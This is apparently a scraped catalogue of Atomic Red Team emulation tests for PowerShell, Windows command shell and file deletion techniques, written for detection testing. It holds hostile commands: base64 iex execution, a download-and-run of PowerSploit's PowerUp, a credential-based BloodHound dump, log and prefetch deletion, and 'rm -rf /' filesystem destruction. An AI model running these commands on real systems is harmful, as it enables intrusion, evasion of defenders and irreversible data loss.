iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
powershellwindowsNTFS Alternate Data Stream Access
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershellelevatedwindowsPowerShell Session Creation and Use
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
powershellwindowsATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
powershellwindowsATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
command_promptwindowsPowerShell Command Execution
powershell.exe -e #{obfuscated_code}
powershellelevatedwindowsPowerShell Invoke Known Malicious Cmdlets
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
powershellwindowsPowerUp Invoke-AllChecks
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershellwindowsAbuse Nslookup with DNS Records
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
powershellwindowsSOAPHound - Dump BloodHound Data
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
powershellwindowsSOAPHound - Build Cache
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.003 Windows Command Shell · 6 tests
powershellwindowsCreate and Execute Batch Script
Start-Process "#{script_path}"
command_promptwindowsWrites text to a file and displays it.
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
command_promptwindowsSuspicious Execution via Windows Command Shell
%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file}
powershellwindowsSimulate BlackByte Ransomware Print Bombing
cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe /p #{file_to_print}" | out-null
command_promptwindowsCommand Prompt read contents from CMD file and execute
cmd /r cmd<"#{input_file}"
command_promptelevatedwindowsCommand prompt writing script to file then executes it
c:\windows\system32\cmd.exe /c cd /d #{script_path} & echo Set objShell = CreateObject("WScript.Shell"):Set objExec = objShell.Exec("whoami"):Set objExec = Nothing:Set objShell = Nothing > #{script_name}.vbs & #{script_name}.vbs
T1070.004 File Deletion · 11 tests
shlinux, macosDelete a single file - FreeBSD/Linux/macOS
rm -f #{file_to_delete}
shlinux, macosDelete an entire folder - FreeBSD/Linux/macOS
rm -rf #{folder_to_delete}
shlinuxOverwrite and delete a file with shred
shred -u #{file_to_shred}
command_promptwindowsDelete a single file - Windows cmd
del /f #{file_to_delete}
command_promptwindowsDelete an entire folder - Windows cmd
rmdir /s /q #{folder_to_delete}
powershellwindowsDelete a single file - Windows PowerShell
Remove-Item -path #{file_to_delete}
powershellwindowsDelete an entire folder - Windows PowerShell
Remove-Item -Path #{folder_to_delete} -Recurse
shlinuxDelete Filesystem - Linux
[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
powershellelevatedwindowsDelete Prefetch File
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
powershellwindowsDelete TeamViewer Log Files
New-Item -Path #{teamviewer_log_file} -Force | Out-Null
Remove-Item #{teamviewer_log_file} -Force -ErrorAction Ignore
command_promptelevatedwindowsClears Recycle bin via rd
rd /s /q %systemdrive%\$RECYCLE.BIN